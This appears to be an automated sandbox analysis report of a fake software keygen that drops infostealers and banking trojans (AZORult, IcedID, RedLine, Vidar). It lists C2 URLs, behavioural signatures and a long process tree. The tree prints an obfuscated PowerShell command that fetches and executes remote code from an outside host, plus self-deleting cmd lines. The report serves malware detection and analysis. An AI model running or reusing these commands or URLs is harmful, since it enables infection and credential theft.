Analysis

  • max time kernel
    55s
  • max time network
    209s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    10-04-2021 21:05

General

  • Target

    Isunshare_Zip_Password_Genius_keygen_by_CORE.exe

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://labsclub.com/welcome

Extracted

Family

azorult

C2

http://kvaka.li/1210776429.php

Extracted

Family

icedid

Campaign

1925120085

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • IcedID, BokBot

    IcedID is a banking trojan capable of stealing credentials.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Blocklisted process makes network request 4 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 2 IoCs
  • Executes dropped EXE 59 IoCs
  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 47 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks for any installed AV software in registry 1 TTPs 53 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 6 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 19 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 18 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 8 IoCs
  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 13 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 8 IoCs
  • Runs ping.exe 1 TTPs 5 IoCs
  • Script User-Agent 4 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SetWindowsHookEx 37 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 4 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s SENS
    1⤵
      PID:1348
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
      1⤵
        PID:2396
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Browser
        1⤵
          PID:2628
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
          1⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2680
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s WpnService
          1⤵
            PID:2720
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
            1⤵
              PID:2412
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
              1⤵
                PID:1872
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s Themes
                1⤵
                  PID:1180
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                  1⤵
                    PID:1164
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                    1⤵
                      PID:1036
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                      1⤵
                        PID:844
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                        1⤵
                          PID:60
                        • C:\Users\Admin\AppData\Local\Temp\Isunshare_Zip_Password_Genius_keygen_by_CORE.exe
                          "C:\Users\Admin\AppData\Local\Temp\Isunshare_Zip_Password_Genius_keygen_by_CORE.exe"
                          1⤵
                          • Suspicious use of WriteProcessMemory
                          PID:1200
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
                            2⤵
                            • Suspicious use of WriteProcessMemory
                            PID:3480
                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
                              keygen-pr.exe -p83fsase3Ge
                              3⤵
                              • Executes dropped EXE
                              • Suspicious use of WriteProcessMemory
                              PID:1252
                              • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
                                "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
                                4⤵
                                • Executes dropped EXE
                                • Suspicious use of WriteProcessMemory
                                PID:1056
                                • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
                                  C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
                                  5⤵
                                    PID:3732
                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
                                keygen-step-1.exe
                                3⤵
                                • Executes dropped EXE
                                PID:1124
                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
                                keygen-step-3.exe
                                3⤵
                                • Executes dropped EXE
                                • Suspicious use of WriteProcessMemory
                                PID:1832
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
                                  4⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:2012
                                  • C:\Windows\SysWOW64\PING.EXE
                                    ping 1.1.1.1 -n 1 -w 3000
                                    5⤵
                                    • Runs ping.exe
                                    PID:2468
                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
                                keygen-step-4.exe
                                3⤵
                                • Executes dropped EXE
                                • Suspicious use of WriteProcessMemory
                                PID:2312
                                • C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe
                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"
                                  4⤵
                                  • Executes dropped EXE
                                  • Suspicious use of AdjustPrivilegeToken
                                  • Suspicious use of WriteProcessMemory
                                  PID:804
                                  • C:\Users\Admin\AppData\Local\Temp\NI4D66GTM3\multitimer.exe
                                    "C:\Users\Admin\AppData\Local\Temp\NI4D66GTM3\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
                                    5⤵
                                    • Executes dropped EXE
                                    • Maps connected drives based on registry
                                    • Drops file in Windows directory
                                    • Enumerates system info in registry
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:504
                                    • C:\Users\Admin\AppData\Local\Temp\NI4D66GTM3\multitimer.exe
                                      "C:\Users\Admin\AppData\Local\Temp\NI4D66GTM3\multitimer.exe" 1 3.1618088764.6072133c215ce 101
                                      6⤵
                                      • Executes dropped EXE
                                      • Adds Run key to start application
                                      PID:4980
                                      • C:\Users\Admin\AppData\Local\Temp\NI4D66GTM3\multitimer.exe
                                        "C:\Users\Admin\AppData\Local\Temp\NI4D66GTM3\multitimer.exe" 2 3.1618088764.6072133c215ce
                                        7⤵
                                        • Executes dropped EXE
                                        • Checks for any installed AV software in registry
                                        PID:5104
                                        • C:\Users\Admin\AppData\Local\Temp\setmxensjyp\1rpastesk0z.exe
                                          "C:\Users\Admin\AppData\Local\Temp\setmxensjyp\1rpastesk0z.exe" /VERYSILENT
                                          8⤵
                                          • Executes dropped EXE
                                          • Suspicious use of SetWindowsHookEx
                                          PID:4748
                                          • C:\Users\Admin\AppData\Local\Temp\is-N4HHJ.tmp\1rpastesk0z.tmp
                                            "C:\Users\Admin\AppData\Local\Temp\is-N4HHJ.tmp\1rpastesk0z.tmp" /SL5="$20252,140785,56832,C:\Users\Admin\AppData\Local\Temp\setmxensjyp\1rpastesk0z.exe" /VERYSILENT
                                            9⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            • Drops file in Program Files directory
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of FindShellTrayWindow
                                            • Suspicious use of SetWindowsHookEx
                                            PID:2204
                                            • C:\Users\Admin\AppData\Local\Temp\is-0BTRV.tmp\apipostback.exe
                                              "C:\Users\Admin\AppData\Local\Temp\is-0BTRV.tmp\apipostback.exe" adan adan
                                              10⤵
                                              • Executes dropped EXE
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of SetWindowsHookEx
                                              PID:4732
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\MzF5hYnUV.dll"
                                                11⤵
                                                  PID:6096
                                                  • C:\Windows\SysWOW64\regsvr32.exe
                                                    regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\MzF5hYnUV.dll"
                                                    12⤵
                                                      PID:4492
                                                      • C:\Windows\system32\regsvr32.exe
                                                        /s "C:\Users\Admin\AppData\Local\Temp\MzF5hYnUV.dll"
                                                        13⤵
                                                        • Loads dropped DLL
                                                        PID:4568
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    cmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\MzF5hYnUV.dllVNoRZgEda.dll"
                                                    11⤵
                                                      PID:6472
                                                      • C:\Windows\SysWOW64\regsvr32.exe
                                                        regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\MzF5hYnUV.dllVNoRZgEda.dll"
                                                        12⤵
                                                        • Executes dropped EXE
                                                        • Checks SCSI registry key(s)
                                                        • Suspicious use of SetWindowsHookEx
                                                        PID:5652
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
                                                      11⤵
                                                        PID:4816
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
                                                          12⤵
                                                            PID:5800
                                                  • C:\Users\Admin\AppData\Local\Temp\hbwppn5k3dj\KiffApp1.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\hbwppn5k3dj\KiffApp1.exe"
                                                    8⤵
                                                    • Executes dropped EXE
                                                    PID:4692
                                                  • C:\Users\Admin\AppData\Local\Temp\sedvj0d5ovb\o1gbtv5foe0.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\sedvj0d5ovb\o1gbtv5foe0.exe"
                                                    8⤵
                                                    • Executes dropped EXE
                                                    PID:5072
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\sedvj0d5ovb\o1gbtv5foe0.exe"
                                                      9⤵
                                                        PID:4776
                                                        • C:\Windows\SysWOW64\PING.EXE
                                                          ping 1.1.1.1 -n 1 -w 3000
                                                          10⤵
                                                          • Runs ping.exe
                                                          PID:1264
                                                    • C:\Users\Admin\AppData\Local\Temp\pjr4xs5u3k3\IBInstaller_97039.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\pjr4xs5u3k3\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
                                                      8⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:4144
                                                      • C:\Users\Admin\AppData\Local\Temp\is-63VP0.tmp\IBInstaller_97039.tmp
                                                        "C:\Users\Admin\AppData\Local\Temp\is-63VP0.tmp\IBInstaller_97039.tmp" /SL5="$202B0,10084460,721408,C:\Users\Admin\AppData\Local\Temp\pjr4xs5u3k3\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
                                                        9⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        • Drops file in Program Files directory
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of FindShellTrayWindow
                                                        • Suspicious use of SetWindowsHookEx
                                                        PID:4152
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          "cmd.exe" /c start http://leatherclothesone.xyz/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039
                                                          10⤵
                                                            PID:4492
                                                          • C:\Users\Admin\AppData\Local\Temp\is-MLST1.tmp\{app}\vdi_compiler.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\is-MLST1.tmp\{app}\vdi_compiler"
                                                            10⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:4456
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              "C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-MLST1.tmp\{app}\vdi_compiler.exe"
                                                              11⤵
                                                                PID:4120
                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                  ping localhost -n 4
                                                                  12⤵
                                                                  • Runs ping.exe
                                                                  PID:6232
                                                        • C:\Users\Admin\AppData\Local\Temp\5ikcjune4kw\kly4z3pa5cw.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\5ikcjune4kw\kly4z3pa5cw.exe" /quiet SILENT=1 AF=756
                                                          8⤵
                                                          • Executes dropped EXE
                                                          • Loads dropped DLL
                                                          • Enumerates connected drives
                                                          • Modifies system certificate store
                                                          • Suspicious use of FindShellTrayWindow
                                                          PID:4416
                                                          • C:\Windows\SysWOW64\msiexec.exe
                                                            "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=756 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\5ikcjune4kw\kly4z3pa5cw.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\5ikcjune4kw\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1617829674 /quiet SILENT=1 AF=756 " AF="756" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912"
                                                            9⤵
                                                              PID:5636
                                                          • C:\Users\Admin\AppData\Local\Temp\s44hxd44bvx\vpn.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\s44hxd44bvx\vpn.exe" /silent /subid=482
                                                            8⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:4396
                                                            • C:\Users\Admin\AppData\Local\Temp\is-GS79A.tmp\vpn.tmp
                                                              "C:\Users\Admin\AppData\Local\Temp\is-GS79A.tmp\vpn.tmp" /SL5="$302C0,15170975,270336,C:\Users\Admin\AppData\Local\Temp\s44hxd44bvx\vpn.exe" /silent /subid=482
                                                              9⤵
                                                              • Executes dropped EXE
                                                              • Loads dropped DLL
                                                              • Drops file in Program Files directory
                                                              • Modifies system certificate store
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              • Suspicious use of FindShellTrayWindow
                                                              • Suspicious use of SetWindowsHookEx
                                                              PID:4788
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
                                                                10⤵
                                                                  PID:5388
                                                                  • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                    tapinstall.exe remove tap0901
                                                                    11⤵
                                                                      PID:5652
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
                                                                    10⤵
                                                                      PID:4664
                                                                      • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                        tapinstall.exe install OemVista.inf tap0901
                                                                        11⤵
                                                                        • Executes dropped EXE
                                                                        • Suspicious use of SetWindowsHookEx
                                                                        PID:6936
                                                                    • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                      "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
                                                                      10⤵
                                                                        PID:8156
                                                                      • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                        "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
                                                                        10⤵
                                                                          PID:8140
                                                                    • C:\Users\Admin\AppData\Local\Temp\odqgzvxrlxs\app.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\odqgzvxrlxs\app.exe" /8-23
                                                                      8⤵
                                                                        PID:4388
                                                                        • C:\Users\Admin\AppData\Local\Temp\odqgzvxrlxs\app.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\odqgzvxrlxs\app.exe" /8-23
                                                                          9⤵
                                                                            PID:7080
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4388 -s 912
                                                                            9⤵
                                                                            • Program crash
                                                                            PID:6096
                                                                        • C:\Users\Admin\AppData\Local\Temp\zs0u2u1xhwy\3ybo2otgm5t.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\zs0u2u1xhwy\3ybo2otgm5t.exe" /ustwo INSTALL
                                                                          8⤵
                                                                          • Executes dropped EXE
                                                                          • Suspicious use of SetWindowsHookEx
                                                                          PID:4356
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4356 -s 652
                                                                            9⤵
                                                                            • Drops file in Windows directory
                                                                            • Program crash
                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                            PID:4852
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4356 -s 664
                                                                            9⤵
                                                                            • Program crash
                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                            PID:5756
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4356 -s 696
                                                                            9⤵
                                                                            • Program crash
                                                                            PID:4440
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4356 -s 740
                                                                            9⤵
                                                                            • Program crash
                                                                            PID:5632
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4356 -s 884
                                                                            9⤵
                                                                            • Program crash
                                                                            PID:6544
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4356 -s 972
                                                                            9⤵
                                                                            • Program crash
                                                                            PID:6912
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4356 -s 1096
                                                                            9⤵
                                                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                            • Program crash
                                                                            PID:6156
                                                                        • C:\Users\Admin\AppData\Local\Temp\rkb2jnw5tbf\Setup3310.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\rkb2jnw5tbf\Setup3310.exe" /Verysilent /subid=577
                                                                          8⤵
                                                                            PID:2076
                                                                            • C:\Users\Admin\AppData\Local\Temp\is-4VBLL.tmp\Setup3310.tmp
                                                                              "C:\Users\Admin\AppData\Local\Temp\is-4VBLL.tmp\Setup3310.tmp" /SL5="$302E6,138429,56832,C:\Users\Admin\AppData\Local\Temp\rkb2jnw5tbf\Setup3310.exe" /Verysilent /subid=577
                                                                              9⤵
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              • Suspicious use of FindShellTrayWindow
                                                                              • Suspicious use of SetWindowsHookEx
                                                                              PID:2696
                                                                              • C:\Users\Admin\AppData\Local\Temp\is-R7LRF.tmp\Setup.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\is-R7LRF.tmp\Setup.exe" /Verysilent
                                                                                10⤵
                                                                                • Executes dropped EXE
                                                                                • Drops file in Program Files directory
                                                                                • Suspicious use of SetWindowsHookEx
                                                                                PID:5600
                                                                                • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\hjjgaa.exe
                                                                                  "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\hjjgaa.exe"
                                                                                  11⤵
                                                                                  • Executes dropped EXE
                                                                                  • Adds Run key to start application
                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                  PID:5892
                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                    12⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                    PID:5092
                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                    12⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                    PID:6636
                                                                                • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\RunWW.exe
                                                                                  "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\RunWW.exe"
                                                                                  11⤵
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                  PID:5912
                                                                                  • C:\Users\Admin\AppData\Roaming\Programma configurater\viqconf.exe
                                                                                    "C:\Users\Admin\AppData\Roaming\Programma configurater\viqconf.exe"
                                                                                    12⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of SetThreadContext
                                                                                    PID:5320
                                                                                • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\jg7_7wjg.exe
                                                                                  "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\jg7_7wjg.exe"
                                                                                  11⤵
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                  PID:5928
                                                                                • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\guihuali-game.exe
                                                                                  "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\guihuali-game.exe"
                                                                                  11⤵
                                                                                  • Executes dropped EXE
                                                                                  • Drops file in Program Files directory
                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                  PID:5956
                                                                                  • C:\Windows\SysWOW64\WScript.exe
                                                                                    "C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"
                                                                                    12⤵
                                                                                      PID:4840
                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                        "C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
                                                                                        13⤵
                                                                                          PID:5448
                                                                                    • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\Three.exe
                                                                                      "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\Three.exe"
                                                                                      11⤵
                                                                                        PID:5984
                                                                                        • C:\Users\Admin\AppData\Local\Temp\9QBSYLZ3U1\multitimer.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\9QBSYLZ3U1\multitimer.exe" 0 306065bb10421b26.04333812 0 103
                                                                                          12⤵
                                                                                          • Executes dropped EXE
                                                                                          • Drops file in Windows directory
                                                                                          PID:6260
                                                                                          • C:\Users\Admin\AppData\Local\Temp\9QBSYLZ3U1\multitimer.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\9QBSYLZ3U1\multitimer.exe" 1 3.1618088800.607213601cf5b 103
                                                                                            13⤵
                                                                                            • Executes dropped EXE
                                                                                            • Adds Run key to start application
                                                                                            PID:6836
                                                                                            • C:\Users\Admin\AppData\Local\Temp\9QBSYLZ3U1\multitimer.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\9QBSYLZ3U1\multitimer.exe" 2 3.1618088800.607213601cf5b
                                                                                              14⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:7040
                                                                                              • C:\Users\Admin\AppData\Local\Temp\luwf5pajehf\Setup3310.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\luwf5pajehf\Setup3310.exe" /Verysilent /subid=577
                                                                                                15⤵
                                                                                                  PID:5816
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-IN3FG.tmp\Setup3310.tmp
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-IN3FG.tmp\Setup3310.tmp" /SL5="$403F4,138429,56832,C:\Users\Admin\AppData\Local\Temp\luwf5pajehf\Setup3310.exe" /Verysilent /subid=577
                                                                                                    16⤵
                                                                                                      PID:3888
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-OIR94.tmp\Setup.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-OIR94.tmp\Setup.exe" /Verysilent
                                                                                                        17⤵
                                                                                                          PID:4432
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\nnwbvizy1dm\app.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\nnwbvizy1dm\app.exe" /8-23
                                                                                                      15⤵
                                                                                                        PID:6184
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\nnwbvizy1dm\app.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\nnwbvizy1dm\app.exe" /8-23
                                                                                                          16⤵
                                                                                                            PID:7844
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 6184 -s 712
                                                                                                            16⤵
                                                                                                            • Program crash
                                                                                                            PID:7612
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\51jnsisd1o4\qplfubmg3ly.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\51jnsisd1o4\qplfubmg3ly.exe" /ustwo INSTALL
                                                                                                          15⤵
                                                                                                            PID:5168
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5168 -s 652
                                                                                                              16⤵
                                                                                                              • Program crash
                                                                                                              PID:1264
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5168 -s 668
                                                                                                              16⤵
                                                                                                              • Program crash
                                                                                                              PID:4484
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5168 -s 776
                                                                                                              16⤵
                                                                                                              • Program crash
                                                                                                              PID:1836
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5168 -s 812
                                                                                                              16⤵
                                                                                                              • Program crash
                                                                                                              PID:5516
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5168 -s 884
                                                                                                              16⤵
                                                                                                              • Program crash
                                                                                                              PID:860
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5168 -s 956
                                                                                                              16⤵
                                                                                                              • Program crash
                                                                                                              PID:7412
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5168 -s 1096
                                                                                                              16⤵
                                                                                                              • Program crash
                                                                                                              PID:7752
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\ziiygxbhphf\vpn.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\ziiygxbhphf\vpn.exe" /silent /subid=482
                                                                                                            15⤵
                                                                                                            • Checks computer location settings
                                                                                                            • Modifies registry class
                                                                                                            PID:4496
